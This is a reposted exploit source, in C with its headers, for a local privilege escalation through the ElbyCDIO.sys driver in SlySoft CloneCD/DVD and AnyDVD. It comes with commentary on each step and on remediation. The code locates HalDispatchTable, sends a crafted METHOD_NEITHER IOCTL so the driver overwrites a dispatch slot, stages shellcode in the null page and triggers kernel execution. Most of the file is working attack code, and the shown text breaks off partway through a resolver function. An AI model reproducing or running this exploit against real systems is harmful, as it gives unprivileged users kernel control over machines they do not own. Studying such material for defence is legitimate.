CloneCD/DVD (ElbyCDIO.sys < 6.0.3.2) Local Privilege Escalation Exploit
来源:http://ntinternals.org/ntiadv0812/ntiadv0812.html 作者:NTInternals 发布时间:2009-03-21  

--------------------------------------------------------------------------ElbyCDIO_Exp.c-----------------------------------------

////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | SlySoft Inc. - http://www.slysoft.com/                                     | //
// |                                                                            | //
// | Affected Software:                                                         | //
// | CloneCD < 5.3.1.4                                                          | //
// | CloneDVD < 2.9.2.2                                                         | //
// | Virtual CloneDrive < 5.4.2.5                                               | //
// | AnyDVD & AnyDVD HD < 6.5.2.8                                               | //
// |                                                                            | //
// | Affected Driver:                                                           | //
// | ElbyCD Windows NT/2000/XP I/O driver - ElbyCDIO.sys < 6.0.3.2              | //
// |                                                                            | //
// | Local Privilege Escalation Exploit                                         | //
// | For Educational Purposes Only !                                            | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | NT Internals - http://www.ntinternals.org/                                 | //
// | alex ntinternals org                                                       | //
// | 18 March 2009                                                              | //
// |                                                                            | //
// | CloneCD/DVD & Virtual CloneDrive & AnyDVD/HD Multiple Vulnerabilities      | //
// | NTIADV0812 - http://www.ntinternals.org/ntiadv0812/ntiadv0812.html         | //
// |                                                                            | //
// | References:                                                                | //
// | Exploiting Common Flaws in Drivers                                         | //
// | Ruben Santamarta - http://www.reversemode.com/                             | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "ElbyCDIO_Exp.h"
#include "InvbShellCode.h"


#define IOCTL_METHOD_NEITHER 0x0022E087
#define INPUT_BUFFER_LENGTH 0x0C
#define INTERNAL_BUFFER_LENGTH 0x1C


//
// Entry point of the proof of concept. Steps, in this order:
//   1. find the running kernel image (load address and file name) through
//      NtQuerySystemInformation(SystemModuleInformation);
//   2. map that same image into this process with LdrLoadDll and resolve
//      HalDispatchTable (here) and the Inbv* exports (XxInitInbv), rebasing
//      each address from the user-mode mapping to the kernel load address;
//   3. open \Device\ElbyCDIO and send IOCTL 0x0022E087, a METHOD_NEITHER
//      request whose input carries a pointer aimed just below HalDispatchTable;
//   4. stage InbvShellCode in the lowest user page and have the kernel call
//      through HalDispatchTable[1] by way of NtQueryIntervalProfile.
// Every pointer goes through (ULONG) and the struct layouts in ElbyCDIO_Exp.h
// are 32-bit, so this only builds and runs correctly as a 32-bit binary.
// Returns 0 on success, otherwise the first non-zero NTSTATUS seen.
// The bug class on display is a driver IOCTL handler that dereferences
// user-supplied pointers without validating them. The generic remediation is
// ProbeForRead/ProbeForWrite under __try/__except for METHOD_NEITHER buffers,
// plus a device DACL that keeps unprivileged users from opening the device.
//
int __cdecl main(int argc, char **argv)
{
    NTSTATUS NtStatus;                      // ULONG here (ElbyCDIO_Exp.h): any non-zero status, warnings included, is treated as failure

    HANDLE DeviceHandle;                    // \Device\ElbyCDIO

    ULONG AllocationSize = PAGE_SIZE * 64;  // 256 KiB for the module list; a longer list simply fails the query below
    ULONG ImageBase;                        // kernel load address, taken from Modules[0]
    PVOID MappedBase;                       // user-mode mapping of the same image (LdrLoadDll)
    UCHAR ImageName[KERNEL_NAME_LENGTH];    // 13 bytes: fits "ntoskrnl.exe" plus NUL and nothing longer
    ULONG DllCharacteristics = DONT_RESOLVE_DLL_REFERENCES; // map only: no import binding, no DllMain

    PVOID HalDispatchTable;                 // kernel-side address of the export
    PVOID xHalQuerySystemInformation;       // HalDispatchTable[1], the slot NtQueryIntervalProfile calls through

    ULONG ShellCodeSize = PAGE_SIZE;
    PVOID ShellCodeAddress;                 // in: hint 0x4; out: the page-aligned base that was actually mapped

    UNICODE_STRING ObjectName;
    UNICODE_STRING DllName;
    UNICODE_STRING DriverServiceName;       // unused
    ANSI_STRING ProcedureName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    IO_STATUS_BLOCK IoStatusBlock;
    PSYSTEM_MODULE_INFORMATION_EX ModuleInformation = NULL; // NULL base: let the allocator choose the address
    LARGE_INTEGER Interval;

    ULONG InternalBuffer[INTERNAL_BUFFER_LENGTH / 4]; // 0x1C bytes of zeros, referenced from the IOCTL input
    ULONG InputBuffer[INPUT_BUFFER_LENGTH / 4];       // three ULONGs handed to the driver verbatim (METHOD_NEITHER)

    ///////////////////////////////////////////////////////////////////////////////////////////////
   
    system("cls");
   
 
    //
    // Step 1: module list. Committing 64 pages up front avoids the usual
    // query-for-size round trip.
    //
    NtStatus = NtAllocateVirtualMemory(
                                       NtCurrentProcess(), // ProcessHandle
                                       &ModuleInformation, // BaseAddress
                                       0,                  // ZeroBits
                                       &AllocationSize,    // AllocationSize
                                       MEM_COMMIT,         // AllocationType
                                       PAGE_READWRITE);    // Protect

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtAllocateVirtualMemory [1] - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    ///////////////////////////////////////////////////////////////////////////////////////////////

    // ReturnLength is not requested: if the list does not fit, the call
    // fails and the program exits rather than retrying with a larger buffer.
    NtStatus = NtQuerySystemInformation(
                                        SystemModuleInformation, // SystemInformationClass
                                        ModuleInformation,       // SystemInformation
                                        AllocationSize,          // SystemInformationLength
                                        NULL);                   // ReturnLength

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtQuerySystemInformation - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    // Modules[0] is assumed to be the kernel itself; neither ModulesCount
    // nor the module name is checked.
    ImageBase = (ULONG)(ModuleInformation->Modules[0].Base);


    // Copies exactly KERNEL_NAME_LENGTH (13) bytes from the base-name part of
    // the path. ImageName is only NUL-terminated when the kernel's file name
    // is 12 characters or fewer (true for ntoskrnl.exe / ntkrnlpa.exe); a
    // longer name leaves printf("%s") and RtlCreateUnicodeStringFromAsciiz
    // reading past the buffer.
    RtlMoveMemory(
                  ImageName,
                  (PVOID)(ModuleInformation->Modules[0].ImageName +
                  ModuleInformation->Modules[0].ModuleNameOffset),
                  KERNEL_NAME_LENGTH);

    printf( " +----------------------------------------------------------------------------+\n"
            " | ImageBase - 0x%.8X                                                     |\n"
            " | ImageName - %s                                                   |\n",
            ImageBase,
            ImageName);


    // MEM_DECOMMIT only: the 256 KiB of address space stays reserved until
    // process exit (MEM_RELEASE would return it).
    NtStatus = NtFreeVirtualMemory(
                                   NtCurrentProcess(), // ProcessHandle
                                   &ModuleInformation, // BaseAddress
                                   &AllocationSize,    // FreeSize
                                   MEM_DECOMMIT);      // FreeType

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtFreeVirtualMemory [1] - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    ///////////////////////////////////////////////////////////////////////////////////////////////

    //
    // Step 2: map the kernel image as an ordinary user-mode DLL so its export
    // table can be read. DllName gets a heap-backed buffer here and is
    // released with RtlFreeUnicodeString after XxInitInbv.
    //
    RtlCreateUnicodeStringFromAsciiz(&DllName, (PUCHAR)ImageName);


    NtStatus = LdrLoadDll(
                          NULL,                // DllPath
                          &DllCharacteristics, // DllCharacteristics
                          &DllName,            // DllName
                          &MappedBase);        // DllHandle

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrLoadDll - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    // RtlInitAnsiString only points ProcedureName at the literal; it does
    // not allocate.
    RtlInitAnsiString(&ProcedureName, "HalDispatchTable");


    // HalDispatchTable is a data export, so the loader resolves it like a
    // function: the result is the table's address inside the user mapping.
    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,          // DllHandle
                                      &ProcedureName,             // ProcedureName
                                      0,                          // ProcedureNumber OPTIONAL
                                      (PVOID*)&HalDispatchTable); // ProcedureAddress

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    // Rebase: user-mode VA -> kernel VA. Casts on an lvalue, (ULONG)p -= x,
    // are an MSVC extension; standard C would need a temporary.
    (ULONG)HalDispatchTable -= (ULONG)MappedBase;
    (ULONG)HalDispatchTable += ImageBase;

    // HalDispatchTable[1]; sizeof(ULONG) is the 32-bit pointer size.
    (ULONG)xHalQuerySystemInformation = (ULONG)HalDispatchTable + sizeof(ULONG);

    printf( " |                                                                            |\n"
            " | HalDispatchTable - 0x%.8X                                              |\n"
            " | xHalQuerySystemInformation - 0x%.8X                                    |\n"
            " +----------------------------------------------------------------------------+\n",
            HalDispatchTable,
            xHalQuerySystemInformation);


    // Resolve and rebase the Inbv* exports used by InbvShellCode while the
    // mapping is still alive.
    NtStatus = XxInitInbv(ImageBase, (ULONG)MappedBase);

 if(NtStatus)
 {
  printf(" [*] NtStatus of XxInitInbv - 0x%.8X\n", NtStatus); 
  return NtStatus;
 }

    // DllName was allocated by RtlCreateUnicodeStringFromAsciiz, so freeing
    // it is correct. ProcedureName, however, still points at a string
    // literal (RtlInitAnsiString above), and RtlFreeAnsiString hands that
    // pointer to the heap free routine; the same mismatch recurs with
    // ObjectName after NtCreateFile and at the end of XxInitInbv. Those
    // three calls should simply be dropped.
    RtlFreeUnicodeString(&DllName);
    RtlFreeAnsiString(&ProcedureName);

    LdrUnloadDll((PVOID)MappedBase);

    ///////////////////////////////////////////////////////////////////////////////////////////////
   
    //
    // Step 3: open the driver's device object. RtlInitUnicodeString only
    // points at the literal; nothing is allocated for ObjectName.
    //
    RtlInitUnicodeString(&ObjectName, L"\\Device\\ElbyCDIO");

    // Hand-rolled InitializeObjectAttributes(); RootDirectory 0 means
    // ObjectName is a full NT object-manager path.
    ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.ObjectName = &ObjectName;
    ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
    ObjectAttributes.SecurityDescriptor = NULL;
    ObjectAttributes.SecurityQualityOfService = NULL;

   
    // The whole chain depends on this open succeeding for a non-administrator:
    // a device DACL that denies unprivileged callers stops it here.
    NtStatus = NtCreateFile(
                            &DeviceHandle,                      // FileHandle
                            FILE_READ_DATA | FILE_WRITE_DATA,   // DesiredAccess
                            &ObjectAttributes,                  // ObjectAttributes
                            &IoStatusBlock,                     // IoStatusBlock
                            NULL,                               // AllocationSize OPTIONAL
                            0,                                  // FileAttributes
                            FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
                            FILE_OPEN_IF,                       // CreateDisposition
                            0,                                  // CreateOptions
                            NULL,                               // EaBuffer OPTIONAL
                            0);                                 // EaLength

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    // Frees a buffer that points at the L"\\Device\\ElbyCDIO" literal (see the
    // note above RtlFreeUnicodeString(&DllName)); should be removed.
    RtlFreeUnicodeString(&ObjectName);

    ///////////////////////////////////////////////////////////////////////////////////////////////

    //
    // IOCTL input. With METHOD_NEITHER the driver receives these three
    // values, and the pointers inside them, exactly as written here: the I/O
    // manager neither copies nor probes them. [0] is a kernel address
    // (HalDispatchTable - 0x1C), [1] is 0, [2] points at 28 zero bytes in
    // this process. What the driver does with them is not visible in this
    // file; the steps that follow (mapping page 0, then calling
    // NtQueryIntervalProfile) imply that the HalDispatchTable[1] slot ends up
    // holding an address inside the lowest user page.
    //
    RtlZeroMemory(InternalBuffer, INTERNAL_BUFFER_LENGTH);

    InputBuffer[0] = (ULONG)HalDispatchTable - INTERNAL_BUFFER_LENGTH;
    InputBuffer[1] = 0;
    InputBuffer[2] = (ULONG)InternalBuffer;


    NtStatus = NtDeviceIoControlFile(
                                     DeviceHandle,         // FileHandle
                                     NULL,                 // Event
                                     NULL,                 // ApcRoutine
                                     NULL,                 // ApcContext
                                     &IoStatusBlock,       // IoStatusBlock
                                     IOCTL_METHOD_NEITHER, // IoControlCode
                                     InputBuffer,          // InputBuffer
                                     INPUT_BUFFER_LENGTH,  // InputBufferLength
                                     NULL,                 // OutputBuffer
                                     0);                   // OutBufferLength

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    ///////////////////////////////////////////////////////////////////////////////////////////////
 
    //
    // Step 4: stage the payload. A base hint of 4 is rounded down to 0 by
    // NtAllocateVirtualMemory and written back into ShellCodeAddress, so the
    // copy below fills the page at VA 0. This requires a system that lets
    // user mode map the null page; Windows 8 and later refuse it by default,
    // which is one of the mitigations for this pattern.
    //
    ShellCodeAddress = (PVOID)sizeof(ULONG);


    NtStatus = NtAllocateVirtualMemory(
                                       NtCurrentProcess(),
                                       &ShellCodeAddress,
                                       0,
                                       &ShellCodeSize,
                                       MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
                                       PAGE_EXECUTE_READWRITE);

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtAllocateVirtualMemory [2] - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    // Copies a whole page starting at InbvShellCode's first byte -- the
    // function plus whatever follows it in .text -- into the new page. The
    // kernel is later made to execute from this user page; where SMEP is in
    // effect such a jump faults instead of running.
    RtlMoveMemory(ShellCodeAddress, (PVOID)InbvShellCode, ShellCodeSize);

    ///////////////////////////////////////////////////////////////////////////////////////////////

    // 0xFFFFFFFFFF676980 = -10,000,000 in 100 ns units: a relative 1 s delay.
    Interval.LowPart = 0xFF676980;
    Interval.HighPart = 0xFFFFFFFF;

    // Four one-second ticks before the trigger.
    printf("\n 3");
    NtDelayExecution(FALSE, &Interval);

    printf(" 2");
    NtDelayExecution(FALSE, &Interval);

    printf(" 1");
    NtDelayExecution(FALSE, &Interval);

    printf(" Hoop\n\n");
    NtDelayExecution(FALSE, &Interval);


    // Trigger. For sources other than ProfileTime the kernel services this
    // call through HalDispatchTable[1] (hence the xHalQuerySystemInformation
    // name above), i.e. through the slot the IOCTL corrupted. If the staged
    // code runs, control never comes back here: InbvShellCode ends in a
    // machine reset.
    NtStatus = NtQueryIntervalProfile(
                                      ProfileTotalIssues, // Source
                                      NULL);              // Interval

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtQueryIntervalProfile - 0x%.8X\n", NtStatus);
        return NtStatus;
    }

    ///////////////////////////////////////////////////////////////////////////////////////////////

    // Only reached if the kernel call returned normally.
    NtStatus = NtClose(DeviceHandle); // Handle

    if(NtStatus)
    {
        printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    return FALSE;
}

-------------------------------------------------ElbyCDIO_Exp.h----------------------------------------------------

// Hand-written ntdll declarations: this header stands in for winternl.h /
// ntifs.h so the program builds with only windows.h and links against
// ntdll.lib (see TARGETLIBS in `sources`).
#define IMP_VOID __declspec(dllimport) VOID __stdcall       // ntdll export returning nothing
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall // ntdll export returning NTSTATUS

#define PAGE_SIZE 0x1000                 // x86 page; sizes the module-list buffer and the shellcode copy

#define OBJ_CASE_INSENSITIVE 0x00000040
#define FILE_OPEN_IF 0x00000003          // open if present, create otherwise (a device object is always present)

#define NtCurrentProcess() ((HANDLE)0xFFFFFFFF) // current-process pseudo handle, hard-coded for 32-bit (the SDK form is (HANDLE)-1)

#define KERNEL_NAME_LENGTH 0x0D          // 13: "ntoskrnl.exe" plus NUL; ImageName in main() is exactly this size

#define STATUS_SUCCESS 0x00000000

typedef ULONG NTSTATUS;                  // unsigned here (the SDK uses LONG); callers test `if(NtStatus)`, so warning/informational statuses count as failures

// Counted 8-bit string. Length and MaximumLength are byte counts, Buffer is
// not necessarily NUL-terminated. Field offsets in the comments assume
// 32-bit pointers. (The tag lacks the leading underscore the other structs
// use; cosmetic only.)
typedef struct ANSI_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PCHAR Buffer;
    /* 0x08 */
}
    ANSI_STRING,
  *PANSI_STRING,
**PPANSI_STRING;

// Counted UTF-16 string. Length and MaximumLength are in bytes, not
// characters. Offsets assume 32-bit pointers.
typedef struct _UNICODE_STRING
{
    /* 0x00 */ USHORT Length;
    /* 0x02 */ USHORT MaximumLength;
    /* 0x04 */ PWSTR Buffer;
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

// Object-manager open parameters for NtCreateFile. Length must be set to
// sizeof(OBJECT_ATTRIBUTES) (0x18 on 32-bit); main() fills every field by
// hand instead of using InitializeObjectAttributes().
typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;                         // 0: ObjectName is a full NT path
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;                             // OBJ_* flags
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

// Completion status of an I/O request. The anonymous union is an MSVC
// extension in C. Neither field is read by this program.
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        /* 0x00 */ NTSTATUS Status;
        /* 0x00 */ PVOID Pointer;
    };

    /* 0x04 */ ULONG Information;                            // request-specific, e.g. bytes transferred
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

// Information classes for NtQuerySystemInformation. Only
// SystemModuleInformation (value 11) is used; the NotImplemented /
// InvalidInfoClass names are placeholders that keep the numbering aligned
// with the kernel's table.
typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemNotImplemented1,
    SystemProcessesAndThreadsInformation,
    SystemCallCounts,
    SystemConfigurationInformation,
    SystemProcessorTimes,
    SystemGlobalFlag,
    SystemNotImplemented2,
    SystemModuleInformation,            // 11: list of loaded kernel modules (SYSTEM_MODULE_INFORMATION_EX)
    SystemLockInformation,
    SystemNotImplemented3,
    SystemNotImplemented4,
    SystemNotImplemented5,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPagefileInformation,
    SystemInstructionEmulationCounts,
    SystemInvalidInfoClass1,
    SystemCacheInformation,
    SystemPoolTagInformation,
    SystemProcessorStatistics,
    SystemDpcInformation,
    SystemNotImplemented6,
    SystemLoadImage,
    SystemUnloadImage,
    SystemTimeAdjustment,
    SystemNotImplemented7,
    SystemNotImplemented8,
    SystemNotImplemented9,
    SystemCrashDumpInformation,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemLoadAndCallImage,
    SystemPrioritySeparation,
    SystemNotImplemented10,
    SystemNotImplemented11,
    SystemInvalidInfoClass2,
    SystemInvalidInfoClass3,
    SystemTimeZoneInformation,
    SystemLookasideInformation,
    SystemSetTimeSlipEvent,
    SystemCreateSession,
    SystemDeleteSession,
    SystemInvalidInfoClass4,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemAddVerifier,
    SystemSessionProcessesInformation
} SYSTEM_INFORMATION_CLASS;

// One entry per loaded kernel module, as returned for
// SystemModuleInformation. main() reads Base, ImageName and
// ModuleNameOffset of entry 0. Offsets assume 32-bit pointers (Base at
// 0x08, entry size 0x11C).
typedef struct _SYSTEM_MODULE_INFORMATION
{
    /* 0x0000 */ ULONG Reserved[2];
    /* 0x0008 */ PVOID Base;                                 // load address of the module
    /* 0x000C */ ULONG Size;
    /* 0x0010 */ ULONG Flags;
    /* 0x0014 */ USHORT Index;
    /* 0x0016 */ USHORT Unknown;
    /* 0x0018 */ USHORT LoadCount;
    /* 0x001A */ USHORT ModuleNameOffset;                    // offset of the base file name inside ImageName
    /* 0x001C */ UCHAR ImageName[256];                       // full path, NUL-terminated
    /* 0x011C */
}
    SYSTEM_MODULE_INFORMATION,
  *PSYSTEM_MODULE_INFORMATION,
**PPSYSTEM_MODULE_INFORMATION;

// Header of the SystemModuleInformation result: a count followed by that
// many SYSTEM_MODULE_INFORMATION entries. Modules[0] is the MSVC zero-length
// array extension (C99 spells it Modules[]).
typedef struct _SYSTEM_MODULE_INFORMATION_EX
{
    /* 0x00 */ ULONG ModulesCount;
    /* 0x04 */ SYSTEM_MODULE_INFORMATION Modules[0];
    /* 0xXX */
}
    SYSTEM_MODULE_INFORMATION_EX,
  *PSYSTEM_MODULE_INFORMATION_EX,
**PPSYSTEM_MODULE_INFORMATION_EX;

// Profile sources accepted by NtQueryIntervalProfile. main() passes
// ProfileTotalIssues (value 2); the point is only that it is not
// ProfileTime, so the query is routed through HalDispatchTable[1].
typedef enum _KPROFILE_SOURCE
{
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,                 // 2: the source used by main()
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE;

// Prototypes for the ntdll exports used by main() and XxInitInbv(). All are
// __stdcall through IMP_VOID / IMP_SYSCALL and come from ntdll.lib. IN, OUT
// and OPTIONAL are the empty annotation macros from windef.h. Parameter
// widths (ULONG sizes, PULONG lengths) match the 32-bit native API only.

// I/O completion APC callback type; NtDeviceIoControlFile is always given
// NULL for it here.
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

// Points DestinationString at SourceString; allocates nothing, so the
// result must not be passed to RtlFreeAnsiString.
IMP_VOID RtlInitAnsiString
(
    IN OUT PANSI_STRING  DestinationString,
    IN PUCHAR SourceString
);

// Points DestinationString at SourceString; allocates nothing, so the
// result must not be passed to RtlFreeUnicodeString.
IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

// Allocates a heap buffer and widens the NUL-terminated ASCII string into it;
// pair with RtlFreeUnicodeString.
IMP_VOID RtlCreateUnicodeStringFromAsciiz
(
    OUT PUNICODE_STRING DestinationString, 
    IN PUCHAR SourceString
);

// Releases a Buffer that the Rtl* allocation routines returned.
IMP_VOID RtlFreeUnicodeString
(
    IN PUNICODE_STRING UnicodeString
);

// Releases a Buffer that the Rtl* allocation routines returned.
IMP_VOID RtlFreeAnsiString
(
    IN PANSI_STRING AnsiString
);

// Maps a DLL into the current process; with DONT_RESOLVE_DLL_REFERENCES in
// *DllCharacteristics the image is mapped without running its entry point.
IMP_SYSCALL LdrLoadDll
(
    IN PWSTR DllPath OPTIONAL,
    IN PULONG DllCharacteristics OPTIONAL,
    IN PUNICODE_STRING DllName,
    OUT PVOID *DllHandle
);

IMP_SYSCALL LdrUnloadDll
(
    IN PVOID DllHandle
);

// Export lookup by name (ProcedureName) or ordinal (ProcedureNumber); the
// address returned is inside the user-mode mapping.
IMP_SYSCALL LdrGetProcedureAddress
(
    IN PVOID DllHandle,
    IN PANSI_STRING ProcedureName OPTIONAL,
    IN ULONG ProcedureNumber OPTIONAL,
    OUT PVOID *ProcedureAddress
);

// *BaseAddress and *AllocationSize are rounded to page boundaries and
// written back.
IMP_SYSCALL NtAllocateVirtualMemory
(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG AllocationSize,
    IN ULONG AllocationType,
    IN ULONG Protect
);

IMP_SYSCALL NtFreeVirtualMemory
(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN OUT PULONG FreeSize,
    IN ULONG FreeType
);

IMP_SYSCALL NtQuerySystemInformation
(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

// Used here to open a device object by its \Device\... path.
IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

// Synchronous use only here (no Event, no APC). For a METHOD_NEITHER
// IoControlCode the driver receives InputBuffer / OutputBuffer as raw user
// pointers, which is the condition this program relies on.
IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

// Negative *Interval is a relative delay in 100 ns units.
IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

// Serviced through HalDispatchTable[1] for sources other than ProfileTime;
// main() uses it purely to reach that slot.
IMP_SYSCALL NtQueryIntervalProfile
(
    IN KPROFILE_SOURCE Source,
    OUT PULONG Interval
);

IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

---------------------------------------------InvbShellCode.h-------------------------------------------------

// Global function pointers to the kernel's boot-video (Inbv*) routines.
// XxInitInbv fills them with rebased kernel addresses; InbvShellCode then
// calls through them from ring 0. They are definitions, not extern
// declarations, so this header may be included by exactly one translation
// unit (ElbyCDIO_Exp.c does that). __stdcall matters: the inline asm in
// InbvShellCode pushes the arguments right-to-left and relies on the callee
// to pop them.

// Callback type for InbvInstallDisplayStringFilter; the shellcode installs
// NULL, i.e. no filter.
typedef VOID (*INBV_DISPLAY_STRING_FILTER)
(
    PUCHAR *String
);

VOID (__stdcall *InbvAcquireDisplayOwnership)
(
    VOID
);

VOID (__stdcall *InbvDisplayString)
(
    IN PCHAR String
);

VOID (__stdcall *InbvEnableDisplayString)
(
    IN BOOLEAN Enable
);

VOID (__stdcall *InbvInstallDisplayStringFilter)
(
    IN INBV_DISPLAY_STRING_FILTER Filter
);

VOID (__stdcall *InbvResetDisplay)
(
    VOID
);

// Left, Top, Width, Height in pixels (see the 640x480 figures in the asm).
VOID (__stdcall *InbvSetScrollRegion)
(
    IN ULONG Left,
    IN ULONG Top,
    IN ULONG Width,
    IN ULONG Height
);

VOID (__stdcall *InbvSetTextColor)
(
    IN ULONG Color
);

VOID (__stdcall *InbvSolidColorFill)
(
    IN ULONG Left,
    IN ULONG Top,
    IN ULONG Width,
    IN ULONG Height,
    IN ULONG Color
);

//
// NTSTATUS XxInitInbv(ULONG ImageBase, ULONG MappedBase)
// Resolves eight Inbv* exports from the user-mode mapping of the kernel image
// at MappedBase, rebases each one to the real kernel load address ImageBase
// (kernel VA = user VA - MappedBase + ImageBase) and stores it in the global
// function pointer of the same name. InbvShellCode later calls those globals
// from ring 0, which is why the addresses must refer to the kernel mapping
// rather than this process's copy.
// Returns STATUS_SUCCESS, or the first failing LdrGetProcedureAddress status.
// Both parameters are ULONG, so this is 32-bit only; the `(ULONG)ptr -= x`
// lvalue casts are an MSVC extension.
//
NTSTATUS XxInitInbv(IN ULONG ImageBase, IN ULONG MappedBase)
{
    NTSTATUS NtStatus;

    ANSI_STRING ProcedureName;          // re-pointed at a different literal for each lookup; never heap-allocated


    //
    // InbvAcquireDisplayOwnership
    //
    // Same three-step pattern for every export below: point ProcedureName at
    // the literal, look it up in the user mapping, rebase to the kernel.

    RtlInitAnsiString(&ProcedureName, "InbvAcquireDisplayOwnership");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,                     // DllHandle
                                      &ProcedureName,                        // ProcedureName
                                      0,                                     // ProcedureNumber OPTIONAL
                                      (PVOID*)&InbvAcquireDisplayOwnership); // ProcedureAddress

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvAcquireDisplayOwnership - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvAcquireDisplayOwnership -= MappedBase;   // user VA -> RVA
    (ULONG)InbvAcquireDisplayOwnership += ImageBase;    // RVA -> kernel VA
   

    //
    // InbvResetDisplay
    //

    RtlInitAnsiString(&ProcedureName, "InbvResetDisplay");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
                                      (PVOID*)&InbvResetDisplay);

    if(NtStatus)
    {
        printf(" [*] NtStatus of LdrGetProcedureAddress - InbvResetDisplay - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    (ULONG)InbvResetDisplay -= MappedBase;
    (ULONG)InbvResetDisplay += ImageBase;


    //
    // InbvSolidColorFill
    //

    RtlInitAnsiString(&ProcedureName, "InbvSolidColorFill");

    NtStatus = LdrGetProcedureAddress(
                                      (PVOID)MappedBase,
                                      &ProcedureName,
                                      0,
